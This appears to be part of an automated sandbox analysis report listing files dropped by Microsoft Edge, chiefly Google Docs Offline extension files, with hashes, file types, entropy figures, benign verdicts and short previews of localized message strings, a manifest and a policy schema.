                                                                                                                                                                                                                                                                                                  MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                  SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                  SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                  SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1063
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                  MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                  SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                  SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                  SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1333
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                  MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                  SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                  SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                  SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1263
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                  MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                  SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                  SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                  SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1074
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                  MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                  SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                  SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                  SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):879
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                  MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                  SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                  SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                  SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1205
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                  MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                  SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                  SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                  SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):843
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                  MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                  SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                  SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                  SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):912
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                  MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                  SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                  SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                  SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):11406
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                                  MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                                  SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                                  SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                                  SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[{"description":"treehash per file","signed_content":{"payload":"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
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):854
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                  MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                  SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                  SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                  SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2525
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                                  MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                                  SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                                  SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                                  SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):97
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                  MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                  SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                  SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                  SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):122218
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                                  MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                                  SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                                  SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                                  SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                  MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                  SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                  SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                  SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):130866
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                                  MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                                  SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                                  SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                                  SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1753
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                  MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                  SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                  SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                  SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9815
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                  MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                  SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                  SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
